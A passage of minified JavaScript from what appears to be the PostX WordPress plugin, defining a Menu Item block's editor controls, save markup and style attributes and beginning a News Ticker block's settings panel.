Text…","ultimate-post"),onChange:e=>h({menuItemText:e}),value:B}):(0,a.createElement)("div",{className:"ultp-menu-item-label-text"},B),K&&("svg"==D?(0,a.createElement)("div",{className:"ultp-menu-item-icon",dangerouslySetInnerHTML:{__html:K}}):(0,a.createElement)("div",{className:"ultp-menu-item-icon"},K)),Z&&(0,a.createElement)("div",{"data-currentbid":`.ultp-block-${L}`,className:"ultp-menu-item-badge"},O)),N&&(0,a.createElement)("div",{className:"ultp-menu-item-dropdown"},$&&r.ZP[N])),(0,a.createElement)("div",{className:`ultp-menu-item-content ${H}`},(0,a.createElement)(c,{renderAppender:!$&&!!e.isSelected&&(()=>(0,a.createElement)(v,{contentClassName:"ultp-menu-add-toolbar",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,a.createElement)("div",{className:"ultp-listmenu-add-item",onClick:()=>e()},n.Z.plus,(0,a.createElement)("div",{className:"__label"},__("Sub Menu","ultimate-post"))),renderContent:({onClose:e})=>(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-items"},(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-item",onClick:()=>{wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/list-menu",{}),0,S),e()}},(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-img"},(0,a.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/list_menu.svg",alt:"List Menu"})),(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-label"},__("List Menu","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-item",onClick:()=>{wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/mega-menu",{}),0,S),e()}},(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-img ultp-megamenu-pro-icon"},(0,a.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/mega_menu.svg",alt:"Mega Menu"}),!ultp_data.active&&(0,a.createElement)("span",{className:"ultp-pro-block"},"Pro")),(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-label"},__("Mega Menu","ultimate-post"))))})),allowedBlocks:["ultimate-post/list-menu","ultimate-post/mega-menu"]})))))}},48396:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,menuItemText:n,hasChildBlock:r,parentBlock:s,childBlock:p,childMegaWidth:c,iconAfterText:u,parentDropIcon:d,menuItemLink:m,menuLinkTarget:g,enableBadge:y,badgeText:b,parentBid:v,menuIconType:h,menuItemIcon:f,menuItemImg:k,menuItemSvg:w}=e.attributes;let x;"img"==h?x=(0,a.createElement)("img",{src:k?.url||"#",alt:"Menu Item Image"}):"icon"==h?x=f?"_ultp_mi_ic_"+f+"_ultp_mi_ic_end_":"":"svg"==h&&(x=w);const T={},_=Object.keys(T);return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,className:`ultp-block-${t} ${s} ${p} ultpMenuCss`},_&&T),(0,a.createElement)("div",{"data-parentbid":v,className:"ultp-menu-item-wrapper"},(0,a.createElement)("div",{className:"ultp-menu-item-label-container"},(0,a.createElement)("a",(0,o.Z)({className:"ultp-menu-item-label ultp-menuitem-pos-"+(u?"aft":"bef")},m&&{href:m,target:g,rel:"noopener"}),n&&(0,a.createElement)("div",{className:"ultp-menu-item-label-text"},n),x&&("svg"==h?(0,a.createElement)("div",{className:"ultp-menu-item-icon",dangerouslySetInnerHTML:{__html:x}}):(0,a.createElement)("div",{className:"ultp-menu-item-icon"},x)),y&&(0,a.createElement)("div",{"data-currentbid":`.ultp-block-${t}`,className:"ultp-menu-item-badge"},b)),d&&(0,a.createElement)("div",{className:"ultp-menu-item-dropdown"},r&&"_ultp_mi_ic_"+d+"_ultp_mi_ic_end_")),(0,a.createElement)("div",{className:`ultp-menu-item-content ${c}`},(0,a.createElement)(i.Content,null))))}},35051:(e,t,l)=>{"use strict";l.d(t,{T:()=>u,m:()=>c});var o=l(67294),a=l(53049),i=l(87763),n=l(92637);const{__}=wp.i18n,{Dropdown:r,ToolbarGroup:s,ToolbarButton:p}=wp.components,c=e=>{const{clientId:t,isSelected:l,store:n}=e;return(0,o.createElement)(o.Fragment,null,l&&(0,o.createElement)(s,{className:"ultp-menu-toolbar-group"},(0,o.createElement)(r,{contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Update Link",icon:i.Z.updateLink,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"text",key:"menuItemText",label:"Label"}},{position:10,data:{type:"linkbutton",key:"menuItemLink",onlyLink:!0,extraBtnAttr:{target:{key:"menuLinkTarget",options:[{value:"_self",label:__("Same Tab","ultimate-post")},{value:"_blank",label:__("New Tab","ultimate-post")}],label:__("Link Target To","ultimate-post")},follow:!1,sponsored:!1,download:!1},label:__("Link","ultimate-post")}}],initialOpen:!0,store:n})})),(0,o.createElement)(s,null,(0,o.createElement)(r,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Style",icon:i.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:n})})),(0,o.createElement)(s,null,(0,o.createElement)(p,{label:"Duplicate",icon:i.Z.duplicate,onClick:()=>{wp.data.dispatch("core/block-editor").duplicateBlocks([t],!0)}})),(0,o.createElement)(s,null,(0,o.createElement)(p,{label:"Delete Item",icon:i.Z.delete,onClick:()=>{wp.data.dispatch("core/block-editor").removeBlock(t,!0)}})))},u=({store:e,clientId:t})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:5,data:{type:"text",key:"menuItemText",label:"Label"}},{position:10,data:{type:"linkbutton",key:"menuItemLink",onlyLink:!0,extraBtnAttr:{target:{key:"menuLinkTarget",options:[{value:"_self",label:__("Same Tab","ultimate-post")},{value:"_blank",label:__("New Tab","ultimate-post")}],label:__("Link Target To","ultimate-post")},follow:!1,sponsored:!1,download:!1},label:__("Link","ultimate-post")}},{position:40,data:{type:"tag",key:"menuIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"img",label:__("Image","ultimate-post")},{value:"svg",label:__("Custom svg","ultimate-post")}]}},{position:50,data:{type:"icon",key:"menuItemIcon",label:__("Icon","ultimate-post")}},{position:60,data:{type:"media",key:"menuItemImg",label:__("Image","ultimate-post")}},{position:70,data:{type:"textarea",key:"menuItemSvg",label:__("SVG code","ultimate-post")}},{position:80,data:{type:"tag",key:"menuItemImgScale",label:__("Image scale","ultimate-post"),options:[{value:"",label:__("None","ultimate-post")},{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Contain","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}]}},{position:90,data:{type:"dimension",key:"menuItemImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Badge","ultimate-post"),depend:"enableBadge",include:[{position:5,data:{type:"text",key:"badgeText",label:__("Badge Label","ultimate-post")}},{position:10,data:{type:"typography",key:"badgeTypo",label:__("Typography","ultimate-post")}},{position:20,data:{type:"color",key:"badgeColor",label:__("Color","ultimate-post")}},{position:30,data:{type:"color2",key:"badgeBg",label:__("Background","ultimate-post")}},{position:40,data:{type:"border",key:"badgeBorder",label:__("Border","ultimate-post")}},{position:50,data:{type:"dimension",key:"badgeRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:60,data:{type:"dimension",key:"badgePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:70,data:{type:"tag",key:"badgePosition",label:__("Badge Position","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")},{value:"left",label:__("Left","ultimate-post")}]}},{position:80,data:{type:"range",key:"badgePositionValue",label:__("Position Adjustment","ultimate-post"),step:1,unit:["px","%"],responsive:!0,min:-200,max:200}},{position:90,data:{type:"range",key:"badgeSpacing",label:__("Gap Between Label and Badge","ultimate-post"),step:1,unit:["px","%"],responsive:!0,min:0,max:200}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Item Style","ultimate-post"),include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content Position","ultimate-post"),include:[{position:40,data:{type:"tag",key:"contentHorizontalPositionType",label:__("Horizontal Position","ultimate-post"),options:[{value:"toLeft",label:__("To Left","ultimate-post")},{value:"toRight",label:__("To Right","ultimate-post")}]}},{position:50,data:{type:"range",key:"contentHorizontalPosition",min:0,max:1200,step:1,responsive:!0,unit:["px"],label:__("Horizontal Position Value","ultimate-post")}},{position:60,data:{type:"tag",key:"contentVerticalPositionType",label:__("Vertical Position","ultimate-post"),options:[{value:"toTop",label:__("To Top","ultimate-post")},{value:"toBottom",label:__("To Bottom","ultimate-post")}]}},{position:70,data:{type:"range",key:"contentVerticalPosition",min:0,max:1200,step:1,responsive:!0,unit:["px"],label:__("Vertical Position Value","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},7004:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(94965),n=l(48396);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/menu/","block_docs"),r("ultimate-post/menu-item",{title:__("Menu Item","ultimate-post"),parent:["ultimate-post/menu","ultimate-post/list-menu"],icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/menu_item.svg",alt:"Menu Item"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Edit and Optimize Individual Menu Items.","ultimate-post")),keywords:[__("menu","ultimate-post"),__("item","ultimate-post")],supports:{html:!1,reusable:!1},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},previewImg:{type:"string",default:""},parentMenuInline:{type:"boolean",default:!0},hasChildBlock:{type:"boolean",default:!1},parentBlock:{type:"string",default:""},childBlock:{type:"string",default:""},childMegaWidth:{type:"string",default:""},parentDropIcon:{type:"string",default:"collapse_bottom_line"},iconAfterText:{type:"boolean",default:!1},parentBid:{type:"string",default:""},menuItemText:{type:"string",default:"List Item"},menuItemLink:{type:"string",default:""},menuLinkTarget:{type:"string",default:"_self"},menuIconType:{type:"string",default:"icon"},menuItemIcon:{type:"string",default:"",style:[{depends:[{key:"menuIconType",condition:"==",value:"icon"}]}]},menuItemImg:{type:"object",default:"",style:[{depends:[{key:"menuIconType",condition:"==",value:"img"}]}]},menuItemSvg:{type:"string",default:"",style:[{depends:[{key:"menuIconType",condition:"==",value:"svg"}]}]},menuItemImgScale:{type:"string",default:"cover",style:[{depends:[{key:"menuIconType",condition:"==",value:"img"}],selector:"{{ULTP}} > .ultp-menu-item-wrapper .ultp-menu-item-label-container .ultp-menu-item-icon img {object-fit: {{menuItemImgScale}};}"}]},menuItemImgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"menuIconType",condition:"==",value:"img"}],selector:"{{ULTP}} > .ultp-menu-item-wrapper .ultp-menu-item-label-container .ultp-menu-item-icon img {border-radius: {{menuItemImgRadius}};}"}]},contentHorizontalPositionType:{type:"string",default:"toRight",style:[{depends:[{key:"parentMenuInline",condition:"==",value:!0}]},{depends:[{key:"parentBlock",condition:"==",value:"hasListMenuParent"}]}]},contentHorizontalPosition:{type:"object",default:{lg:"16",ulg:"px"},style:[{depends:[{key:"parentMenuInline",condition:"==",value:!0},{key:"contentHorizontalPositionType",condition:"==",value:"toRight"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 0% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% - {{contentHorizontalPosition}} ); width: calc( 100% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!0},{key:"contentHorizontalPositionType",condition:"==",value:"toLeft"}],selector:"{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 100% - {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% + 0px ); width: calc( 0% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!1},{key:"parentBlock",condition:"!=",value:"hasListMenuParent"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 100% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% - {{contentHorizontalPosition}} ); width: calc( 100% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentBlock",condition:"==",value:"hasListMenuParent"},{key:"contentHorizontalPositionType",condition:"==",value:"toRight"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks,\n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 100% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% - {{contentHorizontalPosition}} ); width: calc( 100% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentBlock",condition:"==",value:"hasListMenuParent"},{key:"contentHorizontalPositionType",condition:"==",value:"toLeft"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { right: calc( 100% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% + 0px ); width: calc( 100% + {{contentHorizontalPosition}} ); }"}]},contentVerticalPositionType:{type:"string",default:"toBottom",style:[{depends:[{key:"parentMenuInline",condition:"==",value:!1}]}]},contentVerticalPosition:{type:"object",default:{lg:"0",ulg:"px"},style:[{depends:[{key:"parentMenuInline",condition:"==",value:!0}],selector:"\n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                            .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { top: calc( 100% + {{contentVerticalPosition}} );} \n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { top: calc( 0% - {{contentVerticalPosition}} ); height: calc( 100% + {{contentVerticalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!1},{key:"contentVerticalPositionType",condition:"==",value:"toBottom"}],selector:"\n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                            .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { top: calc( 0% + {{contentVerticalPosition}} );} \n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { top: calc( 0% - {{contentVerticalPosition}} ); height: calc( 100% + {{contentVerticalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!1},{key:"contentVerticalPositionType",condition:"==",value:"toTop"}],selector:"\n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                            .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { top: calc( 100% - {{contentVerticalPosition}} );} \n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { top: 0; height: calc( 0% + {{contentVerticalPosition}} ); }"}]},enableBadge:{type:"boolean",default:!1},badgeText:{type:"string",default:"BADGE"},badgeTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:16,unit:"px"},transform:"uppercase",decoration:"none",family:"",weight:500},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"]'}]},badgeColor:{type:"string",default:"#fff",style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { color:{{badgeColor}} }'}]},badgeBg:{type:"object",default:{openColor:1,type:"color",color:"#037FFF",gradient:{}},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"]'}]},badgeBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"]'}]},badgeRadius:{type:"object",default:{lg:{top:"12",bottom:"12",left:"12",right:"12",unit:"px"}},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { border-radius:{{badgeRadius}}; }'}]},badgePadding:{type:"object",default:{lg:{top:"4",bottom:"4",left:"12",right:"12",unit:"px"}},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { padding:{{badgePadding}}; }'}]},badgePosition:{type:"string",default:"top"},badgeSpacing:{type:"object",default:{lg:"8",ulg:"px"},style:[{depends:[{key:"badgePosition",condition:"==",value:"top"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { bottom: calc( 100% + {{badgeSpacing}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"right"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { left: calc( 100% + {{badgeSpacing}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"bottom"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { top: calc( 100% + {{badgeSpacing}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"left"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { right: calc( 100% + {{badgeSpacing}} ); }'}]},badgePositionValue:{type:"object",default:{lg:"10",ulg:"px"},style:[{depends:[{key:"badgePosition",condition:"==",value:"top"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { left: calc( 0% + {{badgePositionValue}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"right"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { top: calc( 0% + {{badgePositionValue}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"bottom"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { left: calc( 0% + {{badgePositionValue}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"left"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { top: calc( 0% + {{badgePositionValue}} ); }'}]},itemTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text"}]},itemColor:{type:"string",default:"",style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColor}}; }"}]},itemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemColorHvr:{type:"string",default:"",style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }"}]},itemBgHvr:{type:"object",default:{openColor:0,type:"color",color:"#FFFFFF"},style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemBorderHvr:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemRadius:{type:"object",default:{top:"",right:"",bottom:"",left:"",unit:"px"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container { border-radius:{{itemRadius}}; }"}]},itemPadding:{type:"object",default:{lg:{top:"",right:"",bottom:"",left:"",unit:"px"}},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container { padding:{{itemPadding}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-menu-item-wrapper { z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} { display:none; }"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} { display:none; }"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} { display:none; }"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},47214:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(43581),s=l(31760),p=l(64766);const{__}=wp.i18n,{dateI18n:c}=wp.date,{InspectorControls:u,useBlockProps:d}=wp.blockEditor,{useEffect:m,useState:g,useRef:y,Fragment:b}=wp.element,{Spinner:v,Placeholder:h}=wp.components,{getBlockAttributes:f,getBlockRootClientId:k}=wp.data.select("core/block-editor");function w(e){const t=y(null),[l,w]=g("Content"),[x,T]=g({postsList:[],loading:!0,error:!1,section:"Content"}),{setAttributes:_,name:C,className:E,attributes:S,clientId:P,attributes:{blockId:L,previewImg:I,advanceId:B,tickerHeading:U,tickImageShow:M,navControlToggle:A,controlToggle:H,tickerType:N,headingText:j,tickTimeShow:Z,TickNavStyle:O,tickTxtStyle:R,TickNavIconStyle:D,timeBadgeType:z,timeBadgeDateFormat:F,currentPostId:W}}=e;function V(){x.error&&T({...x,error:!1}),x.loading||T({...x,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(e.attributes)}).then((e=>{T({...x,postsList:e,loading:!1})})).catch((e=>{T({...x,loading:!1,error:!0})}))}m((()=>{const e=P.substr(0,6),t=f(k(P));(0,a.qi)(_,t,W,P),L?L&&L!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||_({blockId:e})):(_({blockId:e}),ultp_data.archive&&"archive"==ultp_data.archive&&_({queryType:"archiveBuilder"}))}),[P]),m((()=>{const e=t.current;e?(0,a.Qr)(e,S)&&(V(),t.current=S):t.current=S}),[S]),m((()=>{V()}),[]);const G={setAttributes:_,name:C,attributes:S,setSection:w,section:l,clientId:P};let q;if(L&&(q=(0,i.Kh)(S,"ultimate-post/news-ticker",L,(0,a.k0)())),I)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:I});const $=d({...B&&{id:B},className:`ultp-block-${L} ${E}`});return(0,o.createElement)(b,null,(0,o.createElement)(u,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6845",store:G}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:G,title:__("General","ultimate-post"),include:[{position:1,data:{type:"select",key:"tickerType",label:__("Ticker Type","ultimate-post"),options:[{value:"vertical",label:__("Vertical","ultimate-post")},{value:"horizontal",label:__("Horizontal","ultimate-post")},{pro:!0,value:"marquee",label:__("Marquee","ultimate-post")},{pro:!0,value:"typewriter",label:__("Typewriter","ultimate-post")}]}},{position:2,data:{type:"select",key:"tickerDirectionVer",label:__("Direction","ultimate-post"),options:[{value:"up",label:__("Up","ultimate-post")},{value:"down",label:__("Down","ultimate-post")}]}},{position:3,data:{type:"select",key:"tickerDirectionHorizon",label:__("Direction","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:4,data:{type:"range",key:"tickerSpeed",min:1e3,max:1e4,step:100,label:__("Speed","ultimate-post")}},{position:5,data:{type:"range",key:"marqueSpeed",min:1,max:10,step:1,label:__("Speed (Fast to Slow)","ultimate-post")}},{position:6,data:{type:"select",key:"tickerAnimation",label:__("Animation","ultimate-post"),options:[{value:"slide",label:__("Slide","ultimate-post")},{value:"fadein",label:__("Fade In","ultimate-post")},{value:"fadeout",label:__("Fade Out","ultimate-post")}]}},{position:7,data:{type:"select",key:"typeAnimation",label:__("Animation","ultimate-post"),options:[{value:"normal",label:__("Normal","ultimate-post")},{value:"fadein",label:__("Fade In","ultimate-post")},{value:"fadeout",label:__("Fade Out","ultimate-post")}]}},{position:8,data:{type:"toggle",key:"tickerPositionEna",pro:!0,label:__("Position sticky","ultimate-post")}},{position:9,data:{type:"select",key:"tickerPosition",label:__("Select Position","ultimate-post"),options:[{value:"up",label:__("Up","ultimate-post")},{value:"down",label:__("Down","ultimate-post")}]}},{position:10,data:{type:"toggle",key:"pauseOnHover",label:__("Pause On Hover","ultimate-post")}},{position:11,data:{type:"toggle",key:"openInTab",label:__("Open In New Tab","ultimate-post")}}]}),(0,o.createElement)(a.lA,{store:G}),(0,o.createElement)(a.T,{depend:"navControlToggle",store:G,title:__("Ticker Navigator","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"controlToggle",label:__("Show Toggle","ultimate-post")}},{position:2,data:{type:"select",key:"TickNavStyle",label:__("Ticker Navigator Layout","ultimate-post"),options:[{value:"nav1",label:__("Style 1","ultimate-post")},{value:"nav2",label:__("Style 2","ultimate-post")},{value:"nav3",label:__("Style 3","ultimate-post")},{value:"nav4",label:__("Style 4","ultimate-post")}]}},{position:3,data:{type:"select",key:"TickNavIconStyle",label:__("Ticker Icon","ultimate-post"),options:[{value:"Angle2",label:__("Icon 